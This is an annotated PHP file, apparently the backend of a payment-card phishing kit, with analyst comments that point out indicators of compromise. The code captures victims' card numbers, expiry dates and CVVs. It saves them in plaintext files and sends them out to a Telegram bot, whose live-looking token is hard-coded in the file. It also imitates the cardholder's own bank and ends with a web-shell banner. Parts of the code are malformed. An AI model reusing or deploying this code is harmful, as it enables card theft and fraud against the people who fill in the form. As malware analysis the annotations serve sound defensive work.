<?php
// Analyst note: this script is the collection endpoint of a payment-card
// phishing page. On POST it records the submitted card number, expiry and CVV
// on disk and forwards them to a Telegram chat through the Bot API.
// NOTE(review): the text after the closing PHP tag at the end of the file is
// outside PHP and is sent to the client verbatim whenever the script does not
// exit early; it reads like a web-shell banner — confirm provenance.
// Configuration
// Hard-coded Bot API credential and destination chat: together they identify
// the exfiltration channel of this kit instance and are indicators of compromise.
$TELEGRAM_BOT_TOKEN = '2147021455:AAECr25u-TTsb5_CZqvpUBrybQgqVyxtEUY';
$CHAT_ID = '1328122846';
// Start session
// The session supplies 'six_first_digits' (read further down) and later
// receives 'payment_session_id' from the POST handler.
session_start();
// Configuration files
// Relative paths: they resolve against the process working directory.
// NOTE(review): under a web SAPI that is normally the script's own directory,
// so these files may sit inside the web root — confirm on the affected host.
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
$redirect_config_file = $config_dir . '/redirect_settings.json';
// Create config directory if it doesn't exist
// Mode 0755 is requested; the effective mode is still subject to the umask.
if (!file_exists($config_dir) && !is_dir($config_dir)) {
mkdir($config_dir, 0755, true);
}
// Default redirect settings
// Only 'enable_otp' is read again in this file; the other keys are presumably
// consumed by other pages of the kit — not visible here.
$default_settings = [
'success_url' => 'success.html',
'failure_url' => 'failed.html',
'default_destination' => 'https://www.example.com',
'redirect_delay' => 2,
'enable_otp' => true // New setting to enable/disable OTP verification
];
// Load existing redirect settings if file exists
// Values from the JSON file override the defaults key by key (array_merge);
// a file that does not decode to an array is ignored.
$redirect_settings = $default_settings;
if (file_exists($redirect_config_file)) {
$config_content = file_get_contents($redirect_config_file);
$loaded_settings = json_decode($config_content, true);
if (is_array($loaded_settings)) {
$redirect_settings = array_merge($redirect_settings, $loaded_settings);
}
}
// The BIN prefix comes from the session; it is set elsewhere (not in this
// file) and is read here without an isset() check.
$bin = $_SESSION['six_first_digits']; // Get the first 6 digits of the credit card BIN
// Define the BIN database
// Outer key: leading digit of the card number. 'bins' maps "start-end" range
// strings to a bank display name and logo file, used to imitate the
// cardholder's own bank.
$binDatabase = [
"4" => [ // VISA
"name" => "VISA",
"theme" => "visa",
"logo" => "visa-logo.png",
"bins" => [
"4511 58","414740" => ["name" => "mohmad", "logo" => "visa-logo.png"],
"5168 34","414740" => ["name" => "aicha", "logo" => "chase-logo.png"],
"422300-422500" => ["name" => "Bank of America Visa", "logo" => "boa-logo.png"],
"438857-438857" => ["name" => "TD Bank Visa", "logo" => "td-logo.png"],
"412345-412345" => ["name" => "Wells Fargo Visa", "logo" => "wellsfargo-logo.png"],
"400005-400015" => ["name" => "Capital One Visa", "logo" => "capitalone-logo.png"]
]
]
];
// Determine the target path based on BIN ranges
// Selects a per-bank template directory under ../3D/; these relative paths are
// useful when hunting for the rest of the kit on a host. $target is assigned
// here but not referenced again in this file.
$target = "../3D/default/"; // Default folder if no match
foreach ($binDatabase as $cardType) {
foreach ($cardType['bins'] as $range => $details) {
// Splits the array key on "-" into the lower and upper bound of the range.
list($start, $end) = explode("-", $range);
// Loose comparison: numeric strings are compared as numbers.
if ($bin >= $start && $bin <= $end) {
// Match found, set target path based on the bank
if ($details['name'] === "Chase Visa") {
$target = "../3D/bank1/";
} elseif ($details['name'] === "Bank of America Visa") {
$target = "../3D/bank2/";
} elseif ($details['name'] === "TD Bank Visa") {
$target = "../3D/bank3/";
}
break 2; // Exit both loops when a match is found
}
}
}
/**
 * Runs the Luhn checksum over the digits contained in a card number.
 *
 * Every non-digit character is discarded first; input that contains no
 * digits at all is rejected.
 *
 * @param string $cardNumber Card number, optionally with spaces or dashes
 * @return bool True when the Luhn checksum is a multiple of 10
 */
function validateCardNumber($cardNumber) {
    $digits = preg_replace('/\D/', '', $cardNumber);
    if (!ctype_digit($digits)) {
        return false;
    }

    $total = 0;
    // Walk the digits from the rightmost one; odd positions are doubled.
    foreach (str_split(strrev($digits)) as $position => $char) {
        $value = (int) $char;
        if ($position % 2 === 1) {
            $value *= 2;
            // Doubling a digit of 5..9 gives two digits; fold them together.
            $value = $value > 9 ? $value - 9 : $value;
        }
        $total += $value;
    }

    return $total % 10 === 0;
}
/**
* Identifies the bank/issuer based on the credit card BIN
*
* Lookup order: the 3-digit prefix table first, then the table entry for the
* first digit, then the entry for the first two digits. In this kit the result
* is attached to the stored record and to the outgoing notification.
*
* @param string $cardNumber The credit card number
* @param array $binDatabase Map of leading digit(s) to a card scheme entry with
*                           "name", "theme", "logo" and a "bins" map of
*                           "start-end" range strings to bank name/logo
* @param array $czechBanks Map of 3-digit prefix to an entry with "name" and "logo"
* @return array Information about the card issuer or error if not found:
*               on success the keys cardType, cardTheme, bankName, logo, bin
*               and isCzechBank; otherwise an "error" key (plus "bin" when at
*               least six digits were supplied)
*/
function identifyCardIssuer($cardNumber, $binDatabase, $czechBanks) {
// Clean the input
$cardNumber = preg_replace('/\D/', '', $cardNumber);
if (strlen($cardNumber) < 6) {
return ["error" => "Card number too short to determine BIN"];
}
$firstDigit = $cardNumber[0];
$firstTwoDigits = substr($cardNumber, 0, 2);
$bin = substr($cardNumber, 0, 6);
$bin3 = substr($cardNumber, 0, 3); // First 3 digits for Czech banks
// Check for Czech banks first
if (isset($czechBanks[$bin3])) {
$czechBank = $czechBanks[$bin3];
// Determine card type based on first digit
$cardType = "Unknown";
$cardTheme = "default";
if ($firstDigit == "4") {
$cardType = "VISA";
$cardTheme = "visa";
} elseif ($firstDigit == "5") {
$cardType = "Mastercard";
$cardTheme = "mastercard";
} elseif ($firstDigit == "3") {
$cardType = "American Express";
$cardTheme = "amex";
} elseif ($firstDigit == "6") {
$cardType = "Discover";
$cardTheme = "discover";
}
return [
"cardType" => $cardType,
"cardTheme" => $cardTheme,
"bankName" => $czechBank["name"],
"logo" => $czechBank["logo"],
"bin" => $bin,
"isCzechBank" => true
];
}
// Check if the first digit is in our database
if (isset($binDatabase[$firstDigit])) {
$cardType = $binDatabase[$firstDigit];
// Check specific BIN ranges
foreach ($cardType["bins"] as $binRange => $bankInfo) {
// The range key is split on "-" into lower and upper bound.
list($start, $end) = explode('-', $binRange);
// Loose comparison: numeric strings are compared as numbers.
if ($bin >= $start && $bin <= $end) {
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => $bankInfo["name"],
"logo" => $bankInfo["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
}
// If no specific match but card type is recognized
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => "Unknown Bank",
"logo" => $cardType["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
// Check for two-digit prefixes (e.g., JCB)
else if (isset($binDatabase[$firstTwoDigits])) {
$cardType = $binDatabase[$firstTwoDigits];
foreach ($cardType["bins"] as $binRange => $bankInfo) {
list($start, $end) = explode('-', $binRange);
if ($bin >= $start && $bin <= $end) {
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => $bankInfo["name"],
"logo" => $bankInfo["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
}
// No range matched under a two-digit prefix: falls through to the error below.
}
return ["error" => "Unknown card type", "bin" => $bin];
}
/**
 * Groups the digits of a card number into blocks of four separated by spaces.
 *
 * Non-digit characters are dropped before grouping; a final block may be
 * shorter than four digits.
 *
 * @param string $cardNumber The full card number
 * @return string The digits in space-separated groups, or '' when there are none
 */
function formatCardNumber($cardNumber) {
    $digits = preg_replace('/\D/', '', $cardNumber);
    if ($digits === '') {
        return '';
    }

    return implode(' ', str_split($digits, 4));
}
// Check if the form is submitted
// Analyst summary of this handler: it takes the POSTed card fields, writes
// them in plaintext to config/pending_cards.json, data/cards_<date>.txt and
// data/cards.json, sends the same data to api.telegram.org (sendMessage), and
// then redirects the browser to otp_waiting.php. Detection points: those file
// names on disk, and an outbound HTTPS POST to the Telegram Bot API from the
// web server process.
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// Get form data
// Field names expected from the lure form: cardNumber, expiryDate, cvv, saveCard.
$cardNumber = isset($_POST['cardNumber']) ? $_POST['cardNumber'] : '';
$expiryDate = isset($_POST['expiryDate']) ? $_POST['expiryDate'] : '';
$cvv = isset($_POST['cvv']) ? $_POST['cvv'] : '';
$saveCard = isset($_POST['saveCard']) ? 'Yes' : 'No';
// Validate the card
$isValidCard = validateCardNumber($cardNumber);
// Identify the card issuer
$issuerInfo = identifyCardIssuer($cardNumber, $binDatabase, $czechBanks);
// Data to store
// One record per submission: full card number, expiry, CVV, client IP and
// user agent, with an initial status of 'pending'.
$cardInfo = [
'timestamp' => date('Y-m-d H:i:s'),
'card_number' => $cardNumber,
'expiry_date' => $expiryDate,
'cvv' => $cvv,
'save_card' => $saveCard,
'ip' => $_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'status' => 'pending'
];
// Add issuer info if available
if (!isset($issuerInfo["error"])) {
$cardInfo['card_type'] = $issuerInfo["cardType"];
$cardInfo['card_theme'] = $issuerInfo["cardTheme"];
$cardInfo['bank_name'] = $issuerInfo["bankName"];
$cardInfo['logo'] = $issuerInfo["logo"];
$cardInfo['bin'] = $issuerInfo["bin"];
if (isset($issuerInfo["isCzechBank"])) {
$cardInfo['is_czech_bank'] = $issuerInfo["isCzechBank"];
}
}
// Generate a unique session ID for this card
// Record key: uniqid() output, a dash, then 16 hex characters from random_bytes(8).
$sessionId = uniqid() . '-' . bin2hex(random_bytes(8));
// Save to pending cards for admin control panel
// The whole JSON map is read, extended and rewritten on every submission.
$pendingCards = [];
if (file_exists($pending_cards_file)) {
$pendingContent = file_get_contents($pending_cards_file);
$pendingCards = json_decode($pendingContent, true) ?: [];
}
// Add the new card to pending cards
$pendingCards[$sessionId] = $cardInfo;
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pendingCards, JSON_PRETTY_PRINT));
// Store session ID for checking redirect status later
$_SESSION['payment_session_id'] = $sessionId;
// Format message for Telegram with full card number
// The message text below is a stable string pattern for this kit family and
// can be matched when triaging recovered bot chat exports.
$message = "💳 New Card Submitted:\n";
$message .= "------------------------\n";
$message .= "💳 Card Number: " . formatCardNumber($cardNumber) . "\n";
$message .= "📅 Expiry: $expiryDate\n";
$message .= "🔑 CVV: $cvv\n";
$message .= "💾 Save Card: $saveCard\n";
if (!isset($issuerInfo["error"])) {
$message .= "------------------------\n";
$message .= "🏦 Card Type: " . $issuerInfo["cardType"] . "\n";
$message .= "🏦 Bank: " . $issuerInfo["bankName"] . "\n";
$message .= "🏦 BIN: " . $issuerInfo["bin"] . "\n";
if (isset($issuerInfo["isCzechBank"]) && $issuerInfo["isCzechBank"]) {
$message .= "🇨🇿 Czech Bank: Yes\n";
}
}
$message .= "------------------------\n";
$message .= "🌐 IP Address: " . $_SERVER['REMOTE_ADDR'] . "\n";
$message .= "🖥️ User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$message .= "🆔 Session ID: $sessionId\n";
$message .= "⏰ Date/Time: " . date('Y-m-d H:i:s') . "\n";
$message .= "------------------------\n";
// The host in this link is a template placeholder left unchanged by the operator;
// control_panel.php is another file of the kit, not shown here.
$message .= "✅ View in Control Panel: https://yoursite.com/control_panel.php";
// Send to Telegram
// Exfiltration channel: Bot API sendMessage, with the token embedded in the URL path.
$telegramApiUrl = "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage";
// Prepare data for Telegram API
$postData = [
'chat_id' => $CHAT_ID,
'text' => $message,
'parse_mode' => 'HTML'
];
// Send message to Telegram
// The response is captured in $response but not inspected afterwards.
$ch = curl_init($telegramApiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
$response = curl_exec($ch);
curl_close($ch);
// Save data to a local file as backup
// Second on-disk copy, in a relative 'data' directory created on demand.
$data_dir = 'data';
if (!file_exists($data_dir) && !is_dir($data_dir)) {
mkdir($data_dir, 0755, true);
}
// Format data for file
$data = "[" . date('Y-m-d H:i:s') . "]\n";
$data .= "Card Number: $cardNumber\n";
$data .= "Expiry Date: $expiryDate\n";
$data .= "CVV: $cvv\n";
$data .= "Save Card: $saveCard\n";
if (!isset($issuerInfo["error"])) {
$data .= "Card Type: " . $issuerInfo["cardType"] . "\n";
$data .= "Bank: " . $issuerInfo["bankName"] . "\n";
$data .= "BIN: " . $issuerInfo["bin"] . "\n";
}
$data .= "IP Address: " . $_SERVER['REMOTE_ADDR'] . "\n";
$data .= "User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$data .= "Session ID: $sessionId\n";
$data .= "------------------------------------------------\n";
// Save to file (one file per day)
// File name pattern: data/cards_YYYY-MM-DD.txt, appended to on each submission.
$filename = $data_dir . '/cards_' . date('Y-m-d') . '.txt';
file_put_contents($filename, $data, FILE_APPEND);
// Also save to JSON file for easier processing
$json_file = $data_dir . '/cards.json';
// Read existing JSON data if file exists
$existing_data = [];
if (file_exists($json_file)) {
$file_contents = file_get_contents($json_file);
if (!empty($file_contents)) {
$existing_data = json_decode($file_contents, true) ?: [];
}
}
// Add new data
$existing_data[] = $cardInfo;
// Write back to file
file_put_contents($json_file, json_encode($existing_data, JSON_PRETTY_PRINT));
// Determine next step based on settings and bank type
$needsOtp = $redirect_settings['enable_otp'] &&
(isset($issuerInfo["isCzechBank"]) && $issuerInfo["isCzechBank"]);
// Both branches below send the browser to the same page, otp_waiting.php
// (another file of the kit, not shown here).
if ($needsOtp) {
// Redirect to OTP page for Czech banks
header('Location: otp_waiting.php');
} else {
// Redirect to waiting page for non-Czech banks or when OTP is disabled
header('Location: otp_waiting.php');
}
exit;
}
?>
DR.KR LITE SHELL COPYRIGHT 2016